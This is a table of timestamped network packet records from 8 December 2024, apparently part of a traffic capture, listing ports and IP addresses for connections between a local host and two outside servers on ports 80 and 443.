Dec 8, 2024 13:31:55.594511032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.594665051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.594825983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.595074892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.595323086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.595335960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.595410109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.595712900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.595765114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.595813990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.596494913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.596570015 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.596596003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.596663952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.597228050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.597313881 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.597323895 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.597460032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.598047018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.598135948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.598160028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.599008083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.599090099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.599112988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.599328995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.599896908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.599940062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.599963903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.600626945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.600769043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.600780964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.600853920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.601594925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.601690054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.601736069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.601736069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.602315903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.602416992 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.602446079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.602462053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.603183985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.603310108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.603334904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.603616953 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.604028940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.604099989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.604163885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.604233027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.604367971 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.604943991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.605017900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.605046988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.605355978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.605758905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.605957985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.605977058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.606020927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.606800079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.606811047 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.606894970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.607428074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.607557058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.607764959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.607861042 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.607933998 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.607976913 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.607976913 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.607988119 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.607995987 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.608302116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.608431101 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.608458042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.609144926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.609240055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.609266043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.609354973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.609989882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.610148907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.610217094 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.610218048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.610809088 CET	49861	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.610831976 CET	443	49861	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.610872030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.610939026 CET	49861	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.610939026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.610974073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.611104012 CET	49861	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.611114025 CET	443	49861	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.611140966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.611673117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.611789942 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.611809015 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.612029076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.612540007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.612684965 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.612709045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.612770081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.613404036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.613581896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.613607883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.613744020 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.614227057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.614326000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.614345074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.615103006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.615201950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.615221977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.615295887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.615951061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.616249084 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.734745979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.735162973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.735934019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.735946894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.736022949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.736669064 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.740324020 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.740356922 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.740803957 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:55.740809917 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:55.806602955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.807984114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.853894949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.853907108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.853998899 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.855317116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.855369091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.929379940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.929464102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.973907948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.973928928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.973938942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.973949909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.973958969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.973973989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.973989010 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.973998070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974009037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974019051 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974025965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974051952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974060059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974066973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974076033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974083900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974092007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974119902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974148989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974172115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974184990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974199057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974224091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974231958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974240065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974247932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974257946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974302053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974309921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974318027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974334002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974349976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974359989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974371910 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974381924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974392891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974402905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974415064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.974425077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.974453926 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975174904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975193977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975203991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975214005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975223064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975233078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975243092 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975250006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975266933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975279093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975287914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975295067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975306034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975322008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975333929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975353003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975363016 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975373030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975383997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975389957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.975414991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.975451946 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.976109982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976121902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976133108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976142883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976155043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.976190090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.976368904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976454973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976471901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976484060 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976495028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976502895 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.976515055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976526022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976537943 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.976542950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976558924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.976562977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976578951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976581097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.976598978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976604939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976610899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976615906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.976665974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.977268934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977279902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977293015 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977304935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977313995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977333069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.977361917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.977382898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977394104 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977406025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977416039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977426052 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977433920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.977443933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977456093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977466106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.977473974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.977488995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.977905035 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.978243113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978254080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978259087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978265047 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978270054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978276014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978281021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978292942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978308916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978319883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978331089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.978339911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978351116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978363037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.978378057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.978406906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979078054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979089022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979099035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979108095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979129076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979142904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979156971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979161978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979177952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979196072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979224920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979228973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979240894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979253054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979263067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979273081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979298115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979867935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979880095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979890108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979908943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979916096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979923964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979935884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979957104 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.979979992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.979998112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980037928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980052948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980065107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980074883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980083942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980093956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980102062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980113029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980122089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980133057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980160952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980835915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980849981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980860949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980871916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980882883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980897903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980911016 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980921030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980930090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980941057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980948925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980958939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980973005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.980979919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.980993986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981004000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981014967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981023073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981035948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981055021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981080055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981640100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981650114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981658936 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981725931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981725931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981796980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981806993 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981817007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981827021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981837988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981842995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981854916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981862068 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981873035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981883049 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981892109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981900930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981910944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981918097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981928110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981939077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.981961966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.981977940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.982561111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982573032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982587099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982599020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:55.982613087 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.982636929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:55.982697964 CET	80	49835	185.215.113.206	192.168.2.6
